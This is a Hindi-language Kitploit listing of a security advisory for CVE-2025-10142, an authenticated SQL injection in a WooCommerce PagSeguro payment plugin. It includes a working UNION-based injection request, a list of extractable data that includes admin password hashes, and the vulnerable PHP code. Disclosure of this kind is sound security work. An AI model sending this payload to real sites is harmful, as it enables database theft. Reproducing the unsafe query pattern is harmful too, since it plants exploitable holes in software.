Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PagSeguro-Connect-Para-WooCommerce-CVE-Report — CVE-2025-10142 के लिए प्रकटीकरण | Kitploit
उपकरण/GitHubGitHub/mooseloveti/pagseguro-connect-para-woocommerce-cve-report
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubmooseloveti/pagseguro-connect-para-woocommerce-cve-report

PagSeguro-Connect-Para-WooCommerce-CVE-Report

CVE-2025-10142 के लिए प्रकटीकरण

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
8 महीने पहलेअभी तक समीक्षित नहीं

PagSeguro-Connect-Para-WooCommerce-CVE-Report

CVE-2025-10142 के लिए प्रकटीकरण

CVE-2025-10142 - PagSeguro-Connect-para-WooCommerce में भेद्यता

यह रिपॉज़िटरी PagSeguro-Connect-para-WooCommerce <= 4.44.3 में खोजी गई एक भेद्यता का प्रकटीकरण करता है, जो रिकार्डो मार्टिंस द्वारा विकसित WordPress प्लगइन है।

🛠 प्रभावित संस्करण

  • उत्पाद: PagSeguro-Connect-para-WooCommerce
  • संस्करण: v4.44.3
  • URL: https://wordpress.org/plugins/pagbank-connect/

🔒 निर्धारित CVE

CVE IDप्रकारघटकप्रभाव
CVE-2025-10142प्रमाणित (Shop Manager+) SQL इंजेक्शनsrc/Connect/Recurring/Admin/Subscriptions/SubscriptionList.phpप्रमाणित हमलावर डेटा बाहर निकाल सकता है

🧾 विस्तृत विवरण

CVE-2025-10142 — अनधिकृत डेटाबेस एक्सेस और डेटा एक्सफ़िलट्रेशन

  • प्रभावित घटक: rm-pagbank-subscriptions एडमिन पेज
  • हमले का वेक्टर: GET अनुरोध के माध्यम से प्रमाणित (Shop Manager या Administrator)
  • ट्रिगर: status पैरामीटर में दुर्भावनापूर्ण SQL इंजेक्ट करके, एक हमलावर UNION-आधारित SQL इंजेक्शन के माध्यम से डेटाबेस से संवेदनशील डेटा निकाल सकता है।
root@kitploit:~
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -

  • प्रभाव: इंजेक्ट की गई SQL निष्पादित होती है और परिणाम एडमिन पेज पर HTML तालिका में प्रदर्शित होते हैं। निकाले जा सकने वाले डेटा के उदाहरणों में शामिल हैं:
    • version() → डेटाबेस संस्करण
    • user() → MySQL उपयोगकर्ता
    • database() → डेटाबेस नाम
    • SELECT user_login, user_pass FROM wp_users (हैश किए गए एडमिन क्रेडेंशियल)
    • wp_options, wp_usermeta, आदि से कोई भी डेटा

❓ भेद्यता का कारण

status पैरामीटर को बिना escaping किए या $wpdb->prepare() का उपयोग किए बिना सीधे SQL क्वेरी में जोड़ दिया जाता है

root@kitploit:~
if (!empty($_REQUEST['status'])) {
           $status = sanitize_text_field(wp_unslash($_REQUEST['status']));
           $where .= " AND status = '$status'";
       }

$this->items = $wpdb->get_results(
           $wpdb->prepare(
               "SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY  $orderby $order LIMIT %d OFFSET %d",
               $per_page,
               ($current_page - 1) * $per_page
           ),
           ARRAY_A
       );
...


एक टिप्पणी

चूँकि ShopManager से हमला संभव है, खतरा काफी कम है। बाहरी इनपुट को $where में डालकर, उस $where को सीधे SQL सिंटैक्स में डालने की प्रक्रिया का पता लगाना थोड़ा कठिन था।

🔍 खोजकर्ता

नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध


📚 संदर्भ

  • उत्पाद: https://wordpress.org/plugins/pagbank-connect/

⚠️ लाइसेंस

यह एडवाइज़री सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय के साथ साझा करने के लिए स्वतंत्र है।

टूल डाउनलोड करें